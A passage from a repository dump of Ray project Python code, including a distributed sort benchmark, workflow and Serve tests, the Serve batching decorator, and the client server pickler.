# Generate Input
# ------------------------------------------------------------
def _make_partition_info(part_id: PartId, kind="input") -> PartitionInfo:
node = ray.worker.global_worker.node_ip_address
mnt = random.choice(args.mount_points)
filepath = _get_part_path(mnt, part_id, kind)
return PartitionInfo(part_id, node, filepath)
def _get_part_path(mnt: Path, part_id: PartId, kind="input") -> Path:
assert kind in {"input", "output"}
dir_fmt = constants.DATA_DIR_FMT[kind]
dirpath = dir_fmt.format(mnt=mnt)
os.makedirs(dirpath, exist_ok=True)
filename_fmt = constants.FILENAME_FMT[kind]
filename = filename_fmt.format(part_id=part_id)
filepath = os.path.join(dirpath, filename)
return filepath
@ray.remote
def generate_part(part_id: PartId, size: RecordCount,
offset: RecordCount) -> PartitionInfo:
logging_utils.init()
pinfo = _make_partition_info(part_id)
if not args.skip_input:
subprocess.run(
[constants.GENSORT_PATH, f"-b{offset}", f"{size}", pinfo.path],
check=True)
logging.info(f"Generated input {pinfo}")
return pinfo
def generate_input():
if args.skip_input:
return
size = constants.bytes_to_records(args.input_part_size)
offset = 0
tasks = []
for part_id in range(args.num_mappers):
tasks.append(generate_part.remote(part_id, size, offset))
offset += size
assert offset == constants.bytes_to_records(args.total_data_size), args
logging.info(f"Generating {len(tasks)} partitions")
parts = ray.get(tasks)
with open(constants.INPUT_MANIFEST_FILE, "w") as fout:
writer = csv.writer(fout)
writer.writerows(parts)
# ------------------------------------------------------------
# Sort
# ------------------------------------------------------------
def _load_manifest(path: Path) -> List[PartitionInfo]:
if args.skip_input:
return _load_dummy_manifest()
with open(path) as fin:
reader = csv.reader(fin)
return [
PartitionInfo(int(part_id), node, path)
for part_id, node, path in reader
]
def _load_dummy_manifest() -> List[PartitionInfo]:
return [PartitionInfo(i, "", "") for i in range(args.num_mappers)]
def _load_partition(path: Path) -> np.ndarray:
return np.fromfile(path, dtype=np.uint8)
def _dummy_sort_and_partition(part: np.ndarray,
boundaries: List[int]) -> List[BlockInfo]:
N = len(boundaries)
offset = 0
size = int(np.ceil(part.size / N))
blocks = []
for _ in range(N):
blocks.append((offset, size))
offset += size
return blocks
@ray.remote
def mapper(boundaries: List[int], mapper_id: PartId,
path: Path) -> List[ray.ObjectRef]:
logging_utils.init()
task_id = f"M-{mapper_id} Mapper"
logging.info(f"{task_id} starting {args}")
if args.skip_input:
block_size = int(np.ceil(args.input_part_size / args.num_reducers))
return [
ray.put(
np.frombuffer(np.random.bytes(block_size), dtype=np.uint8))
for _ in range(args.num_reducers)
]
part = _load_partition(path)
sort_fn = _dummy_sort_and_partition \
if args.skip_sorting else sortlib.sort_and_partition
blocks = sort_fn(part, boundaries)
logging.info(f"{task_id} saving to object store")
return [ray.put(part[offset:offset + size]) for offset, size in blocks]
def _dummy_merge(blocks: List[np.ndarray], _n: int) -> Iterable[memoryview]:
for block in blocks:
yield block
@ray.remote
def reducer(reducer_id: PartId, *blocks: List[ray.ObjectRef]) -> PartitionInfo:
logging_utils.init()
task_id = f"R-{reducer_id} Reducer"
logging.info(f"{task_id} starting")
blocks = [np.copy(ray.get(block)) for block in blocks]
merge_fn = _dummy_merge if args.skip_sorting else sortlib.merge_partitions
merger = merge_fn(blocks, args.reducer_batch_num_records)
if args.skip_output:
for datachunk in merger:
del datachunk
logging.info(f"{task_id} done")
return None
else:
pinfo = _make_partition_info(reducer_id, "output")
with open(pinfo.path, "wb") as fout:
for datachunk in merger:
fout.write(datachunk)
logging.info(f"{task_id} done")
return pinfo
@tracing_utils.timeit("sorting")
def sort_main():
partitions = _load_manifest(constants.INPUT_MANIFEST_FILE)
boundaries = sortlib.get_boundaries(args.num_reducers)
mapper_results = np.empty(
(args.num_mappers, args.num_reducers), dtype=object)
for part_id, node, path in partitions:
opt = {} if args.skip_input else {
"resources": {
f"node:{node}": 1 / args.num_mappers
},
"memory": args.input_part_size * 1.2,
}
opt.update(num_returns=args.num_reducers)
mapper_results[part_id, :] = mapper.options(**opt).remote(
boundaries, part_id, path)
reducer_results = []
for r in range(args.num_reducers):
opt = {
"memory": args.output_part_size * 1.0,
}
blocks = mapper_results[:, r].tolist()
ret = reducer.options(**opt).remote(r, *blocks)
reducer_results.append(ret)
reducer_results = ray.get(reducer_results)
if not args.skip_output:
with open(constants.OUTPUT_MANIFEST_FILE, "w") as fout:
writer = csv.writer(fout)
writer.writerows(reducer_results)
# ------------------------------------------------------------
# Validate Output
# ------------------------------------------------------------
@ray.remote
def validate_part(path: Path):
logging_utils.init()
proc = subprocess.run([constants.VALSORT_PATH, path], capture_output=True)
if proc.returncode != 0:
logging.critical("\n" + proc.stderr.decode("ascii"))
raise RuntimeError(f"Validation failed: {path}")
logging.info(f"Validated output {path}")
def validate_output():
if args.skip_output:
return
partitions = _load_manifest(constants.OUTPUT_MANIFEST_FILE)
tasks = []
for _, node, path in partitions:
tasks.append(
validate_part.options(resources={
f"node:{node}": 1 / args.num_reducers
}).remote(path))
logging.info(f"Validating {len(tasks)} partitions")
ray.get(tasks)
logging.info("All done!")
# ------------------------------------------------------------
# Main
# ------------------------------------------------------------
def init():
if args.ray_address is None:
ray.init()
else:
ray.init(address=args.ray_address)
logging_utils.init()
logging.info(args)
logging.info(ray.available_resources())
os.makedirs(constants.WORK_DIR, exist_ok=True)
def main():
init()
if args.generate_input:
generate_input()
if args.sort:
sort_main()
if args.validate_output:
validate_output()
if __name__ == "__main__":
args = get_args()
main()
```
#### File: workflow/tests/test_storage_failure.py
```python
import asyncio
import os
from hashlib import sha1
import tempfile
import pytest
import ray
from ray.experimental import workflow
from ray.experimental.workflow.storage import (get_global_storage,
set_global_storage)
from ray.experimental.workflow.storage.debug import DebugStorage
from ray.experimental.workflow.workflow_storage import STEP_OUTPUTS_METADATA
from ray.experimental.workflow.workflow_storage import asyncio_run
from ray.experimental.workflow.storage.filesystem import FilesystemStorageImpl
@workflow.step
def pass_1(x: str, y: str):
return sha1((x + y + "1").encode()).hexdigest()
@workflow.step
def pass_2(x: str, y: str):
if sha1((x + y + "_2").encode()).hexdigest() > x:
return sha1((x + y + "2").encode()).hexdigest()
return pass_1.step(x, y)
@workflow.step
def pass_3(x: str, y: str):
if sha1((x + y + "_3").encode()).hexdigest() > x:
return sha1((x + y + "3").encode()).hexdigest()
return pass_2.step(x, y)
@workflow.step
def merge(x0: str, x1: str, x2: str) -> str:
return sha1((x0 + x1 + x2).encode()).hexdigest()
@workflow.step
def scan(x0: str, x1: str, x2: str):
x0 = sha1((x0 + x2).encode()).hexdigest()
x1 = sha1((x1 + x2).encode()).hexdigest()
x2 = sha1((x0 + x1 + x2).encode()).hexdigest()
y0, y1, y2 = pass_1.step(x0, x1), pass_2.step(x1, x2), pass_3.step(x2, x0)
return merge.step(y0, y1, y2)
def construct_workflow(length: int):
results = ["a", "b"]
for i in range(length):
x0, x1, x2 = results[-2], results[-1], str(i)
results.append(scan.step(x0, x1, x2))
return results[-1]
def _alter_storage(new_storage):
set_global_storage(new_storage)
# alter the storage
ray.shutdown()
os.system("ray stop --force")
workflow.init(new_storage)
def _locate_initial_commit(debug_store: DebugStorage) -> int:
for i in range(len(debug_store)):
log = debug_store.get_log(i)
if log["key"].endswith(STEP_OUTPUTS_METADATA):
return i
return -1
@pytest.mark.parametrize(
"workflow_start_regular",
[{
"num_cpus": 4, # increase CPUs to add pressure
}],
indirect=True)
def test_failure_with_storage(workflow_start_regular):
with tempfile.TemporaryDirectory() as temp_dir:
debug_store = DebugStorage(get_global_storage(), temp_dir)
_alter_storage(debug_store)
wf = construct_workflow(length=3)
result = wf.run(workflow_id="complex_workflow")
index = _locate_initial_commit(debug_store) + 1
def resume(num_records_replayed):
key = debug_store.wrapped_storage.make_key("complex_workflow")
asyncio_run(debug_store.wrapped_storage.delete_prefix(key))
replays = [
debug_store.replay(i) for i in range(num_records_replayed)
]
asyncio_run(asyncio.gather(*replays))
return ray.get(workflow.resume(workflow_id="complex_workflow"))
with pytest.raises(ValueError):
# in cases, the replayed records are too few to resume the
# workflow.
resume(index - 1)
if isinstance(debug_store.wrapped_storage, FilesystemStorageImpl):
# filesystem is faster, so we can cover all cases
step_len = 1
else:
step_len = max((len(debug_store) - index) // 5, 1)
for j in range(index, len(debug_store), step_len):
assert resume(j) == result
if __name__ == "__main__":
import sys
sys.exit(pytest.main(["-v", __file__]))
```
#### File: workflow/tests/test_virtual_actor_2.py
```python
import time
import ray
import pytest
from ray.tests.conftest import * # noqa
from ray.experimental import workflow
@workflow.virtual_actor
class Counter:
def __init__(self, x: int):
self.x = x
@workflow.virtual_actor.readonly
def readonly_get(self):
return self.x
@workflow.virtual_actor.readonly
def readonly_incr(self):
self.x += 1
return self.x
def add(self, y):
self.x += y
return self.x
def __getstate__(self):
return self.x
def __setstate__(self, state):
self.x = state
@workflow.virtual_actor
class IndirectCounter:
def __init__(self, x):
actor = Counter.get_or_create("counter", x)
ray.get(actor.ready())
@workflow.virtual_actor.readonly
def readonly_get(self):
actor = workflow.get_actor("counter")
return actor.readonly_get.run()
@workflow.virtual_actor.readonly
def readonly_incr(self):
actor = workflow.get_actor("counter")
return actor.readonly_incr.run()
def add(self, y):
actor = workflow.get_actor("counter")
return actor.add.run(y)
@workflow.virtual_actor.readonly
def readonly_workload(self):
# simulate a workload
time.sleep(1)
def __getstate__(self):
return
def __setstate__(self, state):
pass
@pytest.mark.parametrize(
"workflow_start_regular",
[{
"num_cpus": 4
# We need more CPUs, otherwise 'create()' blocks 'get()'
}],
indirect=True)
def test_indirect_actor_writer(workflow_start_regular):
actor = IndirectCounter.get_or_create("indirect_counter", 0)
ray.get(actor.ready())
assert actor.readonly_get.run() == 0
array = []
s = 0
for i in range(1, 10):
s += i
array.append(s)
assert [actor.add.run(i) for i in range(1, 10)] == array
assert actor.readonly_get.run() == 45
array = []
for i in range(10, 20):
s += i
array.append(s)
assert ray.get([actor.add.run_async(i) for i in range(10, 20)]) == array
if __name__ == "__main__":
import sys
sys.exit(pytest.main(["-v", __file__]))
```
#### File: ray/serve/batching.py
```python
import asyncio
from functools import wraps
from inspect import iscoroutinefunction
import time
from typing import Any, Callable, List, Optional, overload, Tuple, TypeVar
from ray.serve.exceptions import RayServeException
class _BatchQueue:
def __init__(self,
max_batch_size: int,
timeout_s: float,
handle_batch_func: Optional[Callable] = None) -> None:
"""Async queue that accepts individual items and returns batches.
Respects max_batch_size and timeout_s; a batch will be returned when
max_batch_size elements are available or the timeout has passed since
the previous get.
If handle_batch_func is passed in, a background coroutine will run to
poll from the queue and call handle_batch_func on the results.
Arguments:
max_batch_size (int): max number of elements to return in a batch.
timeout_s (float): time to wait before returning an incomplete
batch.
handle_batch_func(Optional[Callable]): callback to run in the
background to handle batches if provided.
"""
self.queue = asyncio.Queue()
self.full_batch_event = asyncio.Event()
self.max_batch_size = max_batch_size
self.timeout_s = timeout_s
self._handle_batch_task = None
if handle_batch_func is not None:
self._handle_batch_task = asyncio.get_event_loop().create_task(
self._handle_batches(handle_batch_func))
def put(self, request: Tuple[Any, asyncio.Future]) -> None:
self.queue.put_nowait(request)
# Signal when the full batch is ready. The event will be reset
# in wait_for_batch.
if self.queue.qsize() == self.max_batch_size:
self.full_batch_event.set()
async def wait_for_batch(self) -> List[Any]:
"""Wait for batch respecting self.max_batch_size and self.timeout_s.
Returns a batch of up to self.max_batch_size items, waiting for up
to self.timeout_s for a full batch. After the timeout, returns as many
items as are ready.
Always returns a batch with at least one item - will block
indefinitely until an item comes in.
"""
curr_timeout = self.timeout_s
batch = []
while len(batch) == 0:
loop_start = time.time()
# If the timeout is 0, wait for any item to be available on the
# queue.
if curr_timeout == 0:
batch.append(await self.queue.get())
# If the timeout is nonzero, wait for either the timeout to occur
# or the max batch size to be ready.
else:
try:
await asyncio.wait_for(self.full_batch_event.wait(),
curr_timeout)
except asyncio.TimeoutError:
pass
# Pull up to the max_batch_size requests off the queue.
while len(batch) < self.max_batch_size and not self.queue.empty():
batch.append(self.queue.get_nowait())
# Reset the event if there are fewer than max_batch_size requests
# in the queue.
if (self.queue.qsize() < self.max_batch_size
and self.full_batch_event.is_set()):
self.full_batch_event.clear()
# Adjust the timeout based on the time spent in this iteration.
curr_timeout = max(0, curr_timeout - (time.time() - loop_start))
return batch
async def _handle_batches(self, func):
while True:
batch = await self.wait_for_batch()
assert len(batch) > 0
self_arg = batch[0][0]
args = [item[1] for item in batch]
futures = [item[2] for item in batch]
try:
# Method call.
if self_arg is not None:
results = await func(self_arg, args)
# Normal function call.
else:
results = await func(args)
if len(results) != len(batch):
raise RayServeException(
"Batched function doesn't preserve batch size. "
f"The input list has length {len(batch)} but the "
f"returned list has length {len(results)}.")
for i, result in enumerate(results):
futures[i].set_result(result)
except Exception as e:
for future in futures:
future.set_exception(e)
def __del__(self):
if (self._handle_batch_task is None
or not asyncio.get_event_loop().is_running()):
return
# TODO(edoakes): although we try to gracefully shutdown here, it still
# causes some errors when the process exits due to the asyncio loop
# already being destroyed.
self._handle_batch_task.cancel()
def extract_self_if_method_call(args: List[Any],
func: Callable) -> Optional[object]:
"""Check if this is a method rather than a function.
Does this by checking to see if `func` is the attribute of the first
(`self`) argument under `func.__name__`. Unfortunately, this is the most
robust solution to this I was able to find. It would also be preferable
to do this check when the decorator runs, rather than when the method is.
Returns the `self` object if it's a method call, else None.
Arguments:
args (List[Any]): arguments to the function/method call.
func (Callable): the unbound function that was called.
"""
if len(args) > 0:
method = getattr(args[0], func.__name__, False)
if method:
wrapped = getattr(method, "__wrapped__", False)
if wrapped and wrapped == func:
return args.pop(0)
return None
T = TypeVar("T")
R = TypeVar("R")
F = TypeVar("F", bound=Callable[[List[T]], List[R]])
G = TypeVar("G", bound=Callable[[T], R])
# Normal decorator use case (called with no arguments).
@overload
def batch(func: F) -> G:
pass
# "Decorator factory" use case (called with arguments).
@overload
def batch(max_batch_size: Optional[int] = 10,
batch_wait_timeout_s: Optional[float] = 0.0) -> Callable[[F], G]:
pass
def batch(_func=None, max_batch_size=10, batch_wait_timeout_s=0.0):
"""Converts a function to asynchronously handle batches.
The function can be a standalone function or a class method. In both
cases, the function must be `async def` and take a list of objects as
its sole argument and return a list of the same length as a result.
When invoked, the caller passes a single object. These will be batched
and executed asynchronously once there is a batch of `max_batch_size`
or `batch_wait_timeout_s` has elapsed, whichever occurs first.
Example:
>>> @serve.batch(max_batch_size=50, batch_wait_timeout_s=0.5)
async def handle_batch(batch: List[str]):
return [s.lower() for s in batch]
>>> async def handle_single(s: str):
return await handle_batch(s) # Returns s.lower().
Arguments:
max_batch_size (int): the maximum batch size that will be executed in
one call to the underlying function.
batch_wait_timeout_s (float): the maximum duration to wait for
`max_batch_size` elements before running the underlying function.
"""
# `_func` will be None in the case when the decorator is parametrized.
# See the comment at the end of this function for a detailed explanation.
if _func is not None:
if not callable(_func):
raise TypeError("@serve.batch can only be used to "
"decorate functions or methods.")
if not iscoroutinefunction(_func):
raise TypeError(
"Functions decorated with @serve.batch must be 'async def'")
if not isinstance(max_batch_size, int):
if isinstance(max_batch_size, float) and max_batch_size.is_integer():
max_batch_size = int(max_batch_size)
else:
raise TypeError("max_batch_size must be integer >= 1")
if max_batch_size < 1:
raise ValueError("max_batch_size must be an integer >= 1")
if not isinstance(batch_wait_timeout_s, (float, int)):
raise TypeError("batch_wait_timeout_s must be a float >= 0")
if batch_wait_timeout_s < 0:
raise ValueError("batch_wait_timeout_s must be a float >= 0")
def _batch_decorator(_func):
@wraps(_func)
async def batch_wrapper(*args, **kwargs):
args = list(args)
self = extract_self_if_method_call(args, _func)
if len(args) != 1:
raise ValueError("@serve.batch functions can only take a "
"single argument as input")
if len(kwargs) != 0:
raise ValueError(
"@serve.batch functions do not support kwargs")
if self is None:
# For functions, inject the batch queue as an
# attribute of the function.
batch_queue_object = _func
else:
# For methods, inject the batch queue as an
# attribute of the object.
batch_queue_object = self
# The first time the function runs, we lazily construct the batch
# queue and inject it under a custom attribute name. On subsequent
# runs, we just get a reference to the attribute.
batch_queue_attr = f"__serve_batch_queue_{_func.__name__}"
if not hasattr(batch_queue_object, batch_queue_attr):
batch_queue = _BatchQueue(max_batch_size, batch_wait_timeout_s,
_func)
setattr(batch_queue_object, batch_queue_attr, batch_queue)
else:
batch_queue = getattr(batch_queue_object, batch_queue_attr)
future = asyncio.get_event_loop().create_future()
batch_queue.put((self, args[0], future))
# This will raise if the underlying call raised an exception.
return await future
return batch_wrapper
# Unfortunately, this is required to handle both non-parametrized
# (@serve.batch) and parametrized (@serve.batch(**kwargs)) usage.
# In the former case, `serve.batch` will be called with the underlying
# function as the sole argument. In the latter case, it will first be
# called with **kwargs, then the result of that call will be called
# with the underlying function as the sole argument (i.e., it must be a
# "decorator factory.").
return _batch_decorator(_func) if callable(_func) else _batch_decorator
```
#### File: doc/fastapi/fastapi_simple.py
```python
from fastapi import FastAPI
from transformers import pipeline # A simple API for NLP tasks.
app = FastAPI()
nlp_model = pipeline("text-generation", model="gpt2") # Load the model.
# The function below handles GET requests to the URL `/generate`.
@app.get("/generate")
def generate(query: str):
return nlp_model(query, max_length=50) # Output 50 words based on query.
```
#### File: serve/tests/test_async_goal_manager.py
```python
import asyncio
import pytest
from ray.serve.async_goal_manager import AsyncGoalManager
@pytest.mark.asyncio
async def test_wait_for_goals():
manager = AsyncGoalManager()
# Check empty goal
await manager.wait_for_goal(None)
goal_id = manager.create_goal()
loop = asyncio.get_event_loop()
waiting = loop.create_task(manager.wait_for_goal(goal_id))
assert not waiting.done(), "Unfinished task should not be done"
manager.complete_goal(goal_id)
await waiting
# Test double waiting is okay
await manager.wait_for_goal(goal_id)
if __name__ == "__main__":
import sys
sys.exit(pytest.main(["-v", "-s", __file__]))
```
#### File: serve/tests/test_controller.py
```python
import pytest
import ray
from ray import serve
def test_controller_inflight_requests_clear(serve_instance):
controller = serve.api._global_client._controller
initial_number_reqs = ray.get(controller._num_pending_goals.remote())
@serve.deployment
def test(_):
return "hello"
test.deploy()
assert ray.get(
controller._num_pending_goals.remote()) - initial_number_reqs == 0
if __name__ == "__main__":
import sys
sys.exit(pytest.main(["-v", "-s", __file__]))
```
#### File: serve/tests/test_util.py
```python
import json
import numpy as np
import pytest
import ray
from ray.serve.utils import ServeEncoder
from ray._private.utils import import_attr
def test_bytes_encoder():
data_before = {"inp": {"nest": b"bytes"}}
data_after = {"inp": {"nest": "bytes"}}
assert json.loads(json.dumps(data_before, cls=ServeEncoder)) == data_after
def test_numpy_encoding():
data = [1, 2]
floats = np.array(data).astype(np.float32)
ints = floats.astype(np.int32)
uints = floats.astype(np.uint32)
assert json.loads(json.dumps(floats, cls=ServeEncoder)) == data
assert json.loads(json.dumps(ints, cls=ServeEncoder)) == data
assert json.loads(json.dumps(uints, cls=ServeEncoder)) == data
def test_import_attr():
assert (import_attr("ray.serve.BackendConfig") ==
ray.serve.config.BackendConfig)
assert (import_attr("ray.serve.config.BackendConfig") ==
ray.serve.config.BackendConfig)
policy_cls = import_attr("ray.serve.controller.TrafficPolicy")
assert policy_cls == ray.serve.controller.TrafficPolicy
policy = policy_cls({"endpoint1": 0.5, "endpoint2": 0.5})
with pytest.raises(ValueError):
policy.set_traffic_dict({"endpoint1": 0.5, "endpoint2": 0.6})
policy.set_traffic_dict({"endpoint1": 0.4, "endpoint2": 0.6})
print(repr(policy))
# Very meta...
import_attr_2 = import_attr("ray._private.utils.import_attr")
assert import_attr_2 == import_attr
if __name__ == "__main__":
import sys
sys.exit(pytest.main(["-v", "-s", __file__]))
```
#### File: ray/tests/client_test_utils.py
```python
import asyncio
def create_remote_signal_actor(ray):
# TODO(barakmich): num_cpus=0
@ray.remote
class SignalActor:
def __init__(self):
self.ready_event = asyncio.Event()
def send(self, clear=False):
self.ready_event.set()
if clear:
self.ready_event.clear()
async def wait(self, should_wait=True):
if should_wait:
await self.ready_event.wait()
return SignalActor
```
#### File: ray/tests/test_client_server.py
```python
import pytest
from unittest.mock import patch, Mock
from ray.ray_constants import REDIS_DEFAULT_PASSWORD
import ray.util.client.server.server as client_server
@pytest.mark.parametrize("redis_password", [None, "random_password"])
def test_try_create_redis_client(redis_password):
create_mock = Mock(side_effect=lambda x, y: x)
with patch(
"ray._private.services", create_redis_client=create_mock), patch(
"ray._private.services.find_redis_address",
side_effect=[["address0", "address1"], [], ["address0"]]):
# Two redis addresses found
assert client_server.try_create_redis_client(None,
redis_password) is None
create_mock.assert_not_called()
# No redis addresses found
assert client_server.try_create_redis_client(None,
redis_password) is None
create_mock.assert_not_called()
# Exactly one redis address found
assert client_server.try_create_redis_client(
None, redis_password) == "address0"
create_mock.assert_called_once_with(
"address0", redis_password or REDIS_DEFAULT_PASSWORD)
create_mock.reset_mock()
# Manually specify redis
client_server.try_create_redis_client("address100", redis_password)
create_mock.assert_called_once_with(
"address100", redis_password or REDIS_DEFAULT_PASSWORD)
if __name__ == "__main__":
import sys
sys.exit(pytest.main(["-v", __file__]))
```
#### File: ray/tests/test_distributed_sort.py
```python
import pytest
import sys
from ray.experimental.raysort import main
def test_distributed_sort():
main.args = main.get_args()
main.args.ray_address = None
main.args.total_data_size = 1_000_000_000
main.args.skip_input = True
main.args.skip_output = True
main.main()
if __name__ == "__main__":
sys.exit(pytest.main(["-v", __file__]))
```
#### File: ray/tests/test_get_locations.py
```python
import numpy as np
import pytest
import platform
import time
import ray
def test_uninitialized():
with pytest.raises(RuntimeError):
ray.experimental.get_object_locations([])
def test_get_locations_empty_list(ray_start_regular):
locations = ray.experimental.get_object_locations([])
assert len(locations) == 0
def test_get_locations_timeout(ray_start_regular):
sizes = [100, 1000]
obj_refs = [ray.put(np.zeros(s, dtype=np.uint8)) for s in sizes]
ray.wait(obj_refs)
timeout_ms = 0
with pytest.raises(ray.exceptions.GetTimeoutError):
ray.experimental.get_object_locations(obj_refs, timeout_ms)
def test_get_locations(ray_start_regular):
node_id = ray.runtime_context.get_runtime_context().get()["node_id"]
sizes = [100, 1000]
obj_refs = [ray.put(np.zeros(s, dtype=np.uint8)) for s in sizes]
ray.wait(obj_refs)
locations = ray.experimental.get_object_locations(obj_refs)
assert len(locations) == 2
for idx, obj_ref in enumerate(obj_refs):
location = locations[obj_ref]
assert location["object_size"] > sizes[idx]
assert location["node_ids"] == [node_id.hex()]
def test_get_locations_inlined(ray_start_regular):
node_id = ray.runtime_context.get_runtime_context().get()["node_id"]
obj_refs = [ray.put("123")]
ray.wait(obj_refs)
locations = ray.experimental.get_object_locations(obj_refs)
for idx, obj_ref in enumerate(obj_refs):
location = locations[obj_ref]
assert location["node_ids"] == [node_id.hex()]
assert location["object_size"] > 0
@pytest.mark.skipif(
platform.system() == "Windows", reason="Failing on Windows.")
def test_spilled_locations(ray_start_cluster):
cluster = ray_start_cluster
cluster.add_node(num_cpus=1, object_store_memory=75 * 1024 * 1024)
ray.init(cluster.address)
cluster.wait_for_nodes()
node_id = ray.runtime_context.get_runtime_context().get()["node_id"]
@ray.remote
def task():
arr = np.random.rand(5 * 1024 * 1024) # 40 MB
refs = []
refs.extend([ray.put(arr) for _ in range(2)])
ray.get(ray.put(arr))
ray.get(ray.put(arr))
return refs
object_refs = ray.get(task.remote())
ray.wait(object_refs)
locations = ray.experimental.get_object_locations(object_refs)
for obj_ref in object_refs:
location = locations[obj_ref]
assert location["node_ids"] == [node_id.hex()]
assert location["object_size"] > 0
@pytest.mark.skipif(
platform.system() == "Windows", reason="Failing on Windows.")
def test_get_locations_multi_nodes(ray_start_cluster):
cluster = ray_start_cluster
# head node
cluster.add_node(num_cpus=1, object_store_memory=75 * 1024 * 1024)
ray.init(cluster.address)
# add 1 worker node
cluster.add_node(
num_cpus=0,
resources={"custom": 1},
object_store_memory=75 * 1024 * 1024)
cluster.wait_for_nodes()
all_node_ids = list(map(lambda node: node["NodeID"], ray.nodes()))
driver_node_id = ray.runtime_context.get_runtime_context().get()[
"node_id"].hex()
all_node_ids.remove(driver_node_id)
worker_node_id = all_node_ids[0]
@ray.remote(num_cpus=0, resources={"custom": 1})
def create_object():
return np.random.rand(1 * 1024 * 1024)
@ray.remote
def task():
return [create_object.remote()]
object_refs = ray.get(task.remote())
ray.wait(object_refs)
locations = ray.experimental.get_object_locations(object_refs)
for obj_ref in object_refs:
location = locations[obj_ref]
assert set(location["node_ids"]) == {driver_node_id, worker_node_id}
assert location["object_size"] > 0
def test_location_pending(ray_start_cluster):
cluster = ray_start_cluster
cluster.add_node(num_cpus=1, object_store_memory=75 * 1024 * 1024)
ray.init(cluster.address)
cluster.wait_for_nodes()
@ray.remote
def task():
# sleep for 1 hour so the object will be pending
time.sleep(3600)
return 1
object_ref = task.remote()
locations = ray.experimental.get_object_locations([object_ref])
location = locations[object_ref]
assert location["node_ids"] == []
# TODO(chenshen): this is a result of converting int -1 to unsigned int;
# should be fix by https://github.com/ray-project/ray/issues/16321
assert location["object_size"] == 2**64 - 1
```
#### File: ray/tests/test_kv.py
```python
import ray
from ray import ray_constants
from ray._raylet import connect_to_gcs
def run_kv_test(gcs_client):
assert gcs_client.kv_put(b"TEST_KEY", b"TEST_VAL", True)
assert b"TEST_VAL" == gcs_client.kv_get(b"TEST_KEY")
assert not gcs_client.kv_exists(b"TEST_KEY2")
gcs_client.kv_del(b"TEST_KEY")
assert not gcs_client.kv_exists(b"TEST_KEY")
assert gcs_client.kv_put(b"TEST_KEY", b"TEST_VAL", False)
assert not gcs_client.kv_put(b"TEST_KEY", b"TEST_VAL2", False)
assert gcs_client.kv_get(b"TEST_KEY") == b"TEST_VAL"
assert not gcs_client.kv_put(b"TEST_KEY", b"TEST_VAL2", True)
assert gcs_client.kv_get(b"TEST_KEY") == b"TEST_VAL2"
gcs_client.kv_del(b"TEST_KEY")
assert gcs_client.kv_get(b"TEST_KEY") is None
assert gcs_client.kv_put(b"TEST_KEY_1", b"TEST_VAL_1", True)
assert gcs_client.kv_put(b"TEST_KEY_2", b"TEST_VAL_2", True)
assert gcs_client.kv_put(b"TEST_KEY_3", b"TEST_VAL_3", True)
assert gcs_client.kv_put(b"TEST_KEY_4", b"TEST_VAL_4", True)
keys = set(gcs_client.kv_keys(b"TEST_KEY_"))
assert keys == {b"TEST_KEY_1", b"TEST_KEY_2", b"TEST_KEY_3", b"TEST_KEY_4"}
def test_gcs_client_core_worker(shutdown_only):
ray.init()
gcs_client = ray.worker.global_worker.core_worker.get_gcs_client()
run_kv_test(gcs_client)
def test_gcs_client_address(ray_start_cluster_head):
cluster = ray_start_cluster_head
ip, port = cluster.address.split(":")
password = ray_constants.REDIS_DEFAULT_PASSWORD
gcs_client = connect_to_gcs(ip, int(port), password)
run_kv_test(gcs_client)
```
#### File: client/server/server_pickler.py
```python
import io
import sys
import ray
from typing import Any
from typing import TYPE_CHECKING
from ray._private.client_mode_hook import disable_client_hook
import ray.cloudpickle as cloudpickle
from ray.util.client.client_pickler import PickleStub
from ray.util.client.server.server_stubs import ClientReferenceActor
from ray.util.client.server.server_stubs import ClientReferenceFunction
if TYPE_CHECKING:
from ray.util.client.server.server import RayletServicer
import ray.core.generated.ray_client_pb2 as ray_client_pb2
if sys.version_info < (3, 8):
try:
import pickle5 as pickle # noqa: F401
except ImportError:
import pickle # noqa: F401
else:
import pickle # noqa: F401
class ServerPickler(cloudpickle.CloudPickler):
def __init__(self, client_id: str, server: "RayletServicer", *args,
**kwargs):
super().__init__(*args, **kwargs)
self.client_id = client_id
self.server = server
def persistent_id(self, obj):
if isinstance(obj, ray.ObjectRef):
obj_id = obj.binary()
if obj_id not in self.server.object_refs[self.client_id]:
# We're passing back a reference, probably inside a reference.
# Let's hold onto it.
self.server.object_refs[self.client_id][obj_id] = obj
return PickleStub(
type="Object",
client_id=self.client_id,
ref_id=obj_id,
name=None,
baseline_options=None,
)
elif isinstance(obj, ray.actor.ActorHandle):
actor_id = obj._actor_id.binary()
if actor_id not in self.server.actor_refs:
# We're passing back a handle, probably inside a reference.
self.server.actor_refs[actor_id] = obj
if actor_id not in self.server.actor_owners[self.client_id]:
self.server.actor_owners[self.client_id].add(actor_id)
return PickleStub(
type="Actor",
client_id=self.client_id,
ref_id=obj._actor_id.binary(),
name=None,
baseline_options=None,
)
return None
class ClientUnpickler(pickle.Unpickler):
def __init__(self, server, *args, **kwargs):
super().__init__(*args, **kwargs)
self.server = server
def persistent_load(self, pid):
assert isinstance(pid, PickleStub)
if pid.type == "Ray":
return ray
elif pid.type == "Object":
return self.server.object_refs[pid.client_id][pid.ref_id]
elif pid.type == "Actor":
return self.server.actor_refs[pid.ref_id]
elif pid.type == "RemoteFuncSelfReference":
return ClientReferenceFunction(pid.client_id, pid.ref_id)
elif pid.type == "RemoteFunc":
return self.server.lookup_or_register_func(
pid.ref_id, pid.client_id, pid.baseline_options)
elif pid.type == "RemoteActorSelfReference":
return ClientReferenceActor(pid.client_id, pid.ref_id)
elif pid.type == "RemoteActor":
return self.server.lookup_or_register_actor(
pid.ref_id, pid.client_id, pid.baseline_options)
elif pid.type == "RemoteMethod":
actor = self.server.actor_refs[pid.ref_id]
return getattr(actor, pid.name)
else:
raise NotImplementedError("Uncovered client data type")
def dumps_from_server(obj: Any,
client_id: str,
server_instance: "RayletServicer",
protocol=None) -> bytes:
with io.BytesIO() as file:
sp = ServerPickler(client_id, server_instance, file, protocol=protocol)
sp.dump(obj)
return file.getvalue()
def loads_from_client(data: bytes,
server_instance: "RayletServicer",
*,
fix_imports=True,
encoding="ASCII",
errors="strict") -> Any:
with disable_client_hook():
if isinstance(data, str):
raise TypeError("Can't load pickle from unicode string")
file = io.BytesIO(data)
return ClientUnpickler(
server_instance, file, fix_imports=fix_imports,
encoding=encoding).load()
def convert_from_arg(pb: "ray_client_pb2.Arg",
server: "RayletServicer") -> Any:
return loads_from_client(pb.data, server)
```
#### File: tests/distributed_multigpu_tests/test_distributed_multigpu_broadcast.py
```python
import pytest
import cupy as cp
import ray
